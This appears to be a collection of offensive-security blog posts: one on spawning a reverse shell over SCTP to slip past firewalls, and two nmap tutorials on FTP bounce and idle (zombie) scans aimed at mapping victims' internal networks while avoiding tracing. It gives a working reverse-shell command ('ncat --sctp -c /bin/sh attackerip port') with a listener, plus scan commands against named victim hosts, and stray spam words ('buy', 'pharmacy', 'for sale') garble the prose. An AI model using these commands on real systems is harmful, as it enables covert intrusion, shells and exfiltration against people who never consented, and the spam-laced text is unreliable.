SCTP Reverse Shell

So, buy over the last while I was looking at “Interesting” ways to throw back a reverse shell and remain under the radar a little bit. UDP, TCP and ICMP reverse shells have been done to death (heck, you can even use DNS tunneling), so I had the daft idea to try SCTP.

I noticed while testing it, many rubbish “Security in a box” firewalls do not actually parse SCTP packets at all, and just let them zip right through the firewall without checking their contents. So it looked like a perfect candidate for data exfiltration, spawning reverse shells, and other such mischief :)

Anyway, at first I tested the idea out using ncat (from nmap), which features SCTP support and basically is a full replacement for netcat.

NOTE: SCTP support should be enabled by default on Linux. If it aint, do “modprobe sctp” and see does it work then. I found that OpenVZ virtual machines tend to not have SCTP support, depending on if it is supported on the host or not.

With ncat, doing the following is enough to deliver a reverse shell over SCTP.

rootedbox:~# ncat –sctp -c /bin/sh attackerip port

attacker:~# ncat –sctp -l -v -p port

Screenshot of this:

sctp reverse shell with netcat

sctp reverse shell with netcat

So, we can do it with ncat, however I wanted to see how hard it would be to implement this in python.

Luckily, there is a python module for making SCTP connections – pysctp. It behaves very similarly to the socket module.

After a bit of playing around, I managed to implement a reverse shell over SCTP in python, which you can find here:


python sctp reverse shell

SCTP Reverse shell in python

Further development includes implementing SSL – it works, just tends to randomly die because pythons SSL library is rubbish, and writing these payloads in a native language (C) as opposed to python. Lots more to do here!


Nmap – FTP Bounce Scans

In part One and Two of this series I described various methods of evading IDS/IPS/Firewalls, sick and general methods of evading detection when port scanning your targets using nmap.
In this instalment I hope to give an overview of the technique called the “FTP Bounce” Scan technique, and various “interesting” uses I have had for it…
This, along with my other nmap articles, is all kind of my notes for the wiki article over at – reopening soon – with lots of shiny new content and awesome stuff!

So, how does FTP Bounce work?
Well, the File Transfer Protocol, according to its RFC (RFC 959 according to nmap man pages), has a feature called the PORT command (now I may be messing up, but I THINK this is the command. Ping me if I am wrong :3 ). Basically it allows proxy FTP connections, where I can ask the FTP server I am connected to to send a file to a host/port I specify. Obviously, in order to send a file to another host/port, it has to CONNECT to said host/port. So, we can use this to get the FTP server to check is said host/port open… Seeing what I am getting at here?

We can make an arbritary FTP server port scan another server for us (IF said FTP server supports this “feature”… Which, according to nmaps man pages, many do not anymore… but still!).

Now, most of us are likely thinking “Right, so I an make random FTP servers act as “drones” during my port scans… AWESOME!”. Yes, yes you can. This puts another “hop” between you and your victim, meaning it is a shitload harder to trace it back to you! Using standard methods like -T0 and such are recommended here, to make things even sneaker. As the FTP server is not DESIGNED to be a port scanner, it is not exactly going to be stealthy… So we kind of have to rely on timing. Need I say this is TCP ports only also?

Now for the super fun part. Now the following idea, I thought was fairly original when I came up with it while walking my dog. However, upon reading the man pages for nmap (and you wondered why I was sleep deprived? I STILL AM!) I realized Fyodor had gotten there first. Years ago. Feck.
However, it is still a cool trick… So I will outline it.

Say you are scanning company.tld, and have found a FTP server on their network, but the rest of the bloody network is firewalled off. You wish to scan the inside of their network. So, you somehow have gained credentials to their FTP server (or it supports anonymous logins), and you are still wondering how to use this to scan out the insides.
Use the external FTP server as your bounce host, and ask it to scan various inside-network ranges (just use the default 10.x, 192.168.x, etc) for you until you figure out which addressing scheme they use. Then ask it to scan the whole bloody network for you! Now, you have mapped out their internal networks by simply leveraging the FTP Bounce bug in their FTP server! Awesome, no?

Using FTP Bounce (Assuming you have a vulnerable FTP that allows this, see the ftp-bounce NSE script for checking FTP servers…)

root@bha:~# nmap -T0 -b username:password@ftpserver.tld:21 victim.tld

This uses the username “username”, the password “password”, the FTP server “ftpserver.tld” and port 21 on said server to scan victim.tld.
If the FTP server supports anonymous logins, just forget about the username:password@ part and nmap will assume it allows-anonymous. You may omit :21 if the FTP port is 21, however, some people configure FTP on wierd ports as an attempt at “security”.

So, thought up of any “fun” uses for the FTP bounce scan technique? Tell us about them! And keep an eye out for the finished Wiki article over at (if I ever finish it, that is :P )

// Yay! Still importing content with great success!

Nmap – Idle Scan

So, for sale in part one 1 I briefly described several of nmaps IDS/IPS/Firewall evasion techniques, and in this installment (a brief one) I hope to quickly go over another amazing technique: The Idle Scan. This is also kind of a rough article to add to the nmap wiki page on , pharmacy which is reopening sometime soon with LOADS of AWESOME new content!

Idle scanning is an INCREDIBLY sneaky scan technique which nmap can implement. The awesome thing about idle scan is that it allows you to scan a host WITHOUT EVER SENDING PACKETS TO IT.

How this works is actually fairly simple, though I must admit it was pretty friggin mind-bending the first time I looked into it. Please note: Idle scans MAY still set off the victims IDS, so I advise -T0 with this, and a hell of a lot of patience. However, seeing as you are not really touching the victim at all (well, the packets don’t seem to come from you, ever) it is fairly safe method.

So, how DOES it work?
Well, I must admit: I am NO expert on TCP/IP – I know a bit, but still have a lot to learn. But, essentially, it uses the IPID field in IP packets. In a basic sense, you find a host that is “idle” – i.e. little to no traffic coming to/from it, and that is your “zombie host”. All scanning activities will APPEAR to be coming from this host.

You send your scan packets TO the victim host (yes, you can use all the fragmentation and such I discussed earlier here, just I do not think traditional decoy’s work – I will have to check this though), pretending to be the zombie host.
Before you send a packet to the target, you send one to the zombie, to get its current IPID.

Now for the cool part. When a box recieves a RST, its IPID does NOT increment/change as RST packets are not replied to (assuming the zombie host is one with a predictable IPID sequence – a lot of boxes just increment by one. Hint from ohdae – Printers!).
HOWEVER, when a host receives a SYN-ACK, its IPID DOES change.

So. When your scan hits an OPEN port on the victim, it replies with a SYN-ACK to the Zombie host. This causes the zombie’s IPID to increment, and when you re-probe the zombie host, its IPID will have incremented.
When you hit a CLOSED port on victim, it sends a RST to Zombie, and… Zombie’s IPID does NOT increment. So, by slowly probing Zombie immediately before + after sending packets to the Victim, you can INDIRECTLY find out what ports on the Victim are open…

Caveat: This scan does have some inherent “fudge factor” and inaccuracy, but by repeating the test a bunch of times you can solve this problem. nmap also seems to have some kind of “magic” that helps here…

For more information on idlescan in nmap:

Nmap’s man pages make a PARTICULARLY interesting point: What if, you use Zombie(s) that you think might be considered “trusted hosts” by the victim? This is a VERY interesting way of navigating firewalls and such… Think it over…
(Pointer: Say the victims have an exposed network printer that you KNOW is on their internal network. How about zombie scanning their intranet from the outside due to this misconfiguration? Shit like this is why guys like me look like friggin ninjas sometimes (also, yes, I am currently in a state of sleep deprivation, and exhausted. Cut me some slack :P )…)

ANYWAYS, now to the usage:

root@bha:~# nmap -sI -T0 victim.tld

This would scan victim.tld, using as its “Zombie Host”, and sending the probes to Zombie on port 23 (note: you do need an open port on the zombie for this… The default is 80)

I was going to write more, but then realized that I have not a lot more to say on this. Except that I will be re-writing it and drawing a diagram for the wiki article on Blackhat Academy.